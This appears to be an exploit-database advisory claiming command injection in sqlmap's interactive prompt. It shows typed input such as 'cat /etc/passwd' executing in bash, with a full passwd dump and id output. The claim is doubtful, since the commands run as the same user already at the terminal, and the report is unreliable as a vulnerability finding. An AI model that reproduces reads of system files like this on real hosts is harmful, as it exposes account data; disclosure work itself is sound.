# Exploit Title: SQLmap - Command Injection
# Google Dork: Nope :(
# Date: 20 January 16:02
# Author: Mizaru
# Vendor Homepage: https://sqlmap.org
# Software Link: https://github.com/sqlmapproject/sqlmap
# Version: Last Version
# Tested on: ParrotSec & Windows 10
# CVE : Nope :(
The vulnerability happend when you want to choose an option
Yes, the sqlmap program execute command.
PoC:
-> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] lol
-> bash: lol : commande introuvable
If you understand french langage, you see that the program execute an bash command.
So if we test to do an real command, what happen ?
-> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:104:109:MySQL Server,,,:/nonexistent:/bin/false
freerad:x:105:110::/etc/freeradius:/usr/sbin/nologin
Debian-exim:x:106:111::/var/spool/exim4:/usr/sbin/nologin
debian-tor:x:107:112::/var/lib/tor:/bin/false
uuidd:x:108:115::/run/uuidd:/usr/sbin/nologin
rwhod:x:109:65534::/var/spool/rwho:/usr/sbin/nologin
redsocks:x:110:116::/var/run/redsocks:/usr/sbin/nologin
shellinabox:x:111:117:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin
postgres:x:112:118:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
redis:x:114:120::/var/lib/redis:/usr/sbin/nologin
miredo:x:115:65534::/var/run/miredo:/usr/sbin/nologin
ntp:x:116:121::/nonexistent:/usr/sbin/nologin
stunnel4:x:117:122::/var/run/stunnel4:/usr/sbin/nologin
dnsmasq:x:118:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:119:123::/nonexistent:/usr/sbin/nologin
iodine:x:120:65534::/var/run/iodine:/usr/sbin/nologin
arpwatch:x:121:125:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
sslh:x:122:130::/nonexistent:/usr/sbin/nologin
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
rtkit:x:124:131:RealtimeKit,,,:/proc:/usr/sbin/nologin
avahi:x:125:133:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
inetsim:x:126:134::/var/lib/inetsim:/usr/sbin/nologin
gluster:x:127:136::/var/lib/glusterd:/usr/sbin/nologin
colord:x:128:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
saned:x:129:139::/var/lib/saned:/usr/sbin/nologin
geoclue:x:130:141::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:131:142:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
king-phisher:x:132:145::/var/lib/king-phisher:/usr/sbin/nologin
lightdm:x:133:146:Light Display Manager:/var/lib/lightdm:/bin/false
dradis:x:134:147::/var/lib/dradis:/usr/sbin/nologin
beef-xss:x:135:148::/var/lib/beef-xss:/usr/sbin/nologin
i2psvc:x:136:149::/var/lib/i2p:/usr/sbin/nologin
l0uky:x:1000:1000:0xL0uky,,,:/home/l0uky:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/sbin/nologin
But we can do an id/whoami for see what user we execute this command
-> uid=1000(l0uky) gid=1000(l0uky) groupes=1000(l0uky),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),135(scanner)
So you can see, the command was execute with the user who executed sqlmap :)
Not too dangerous but must be patched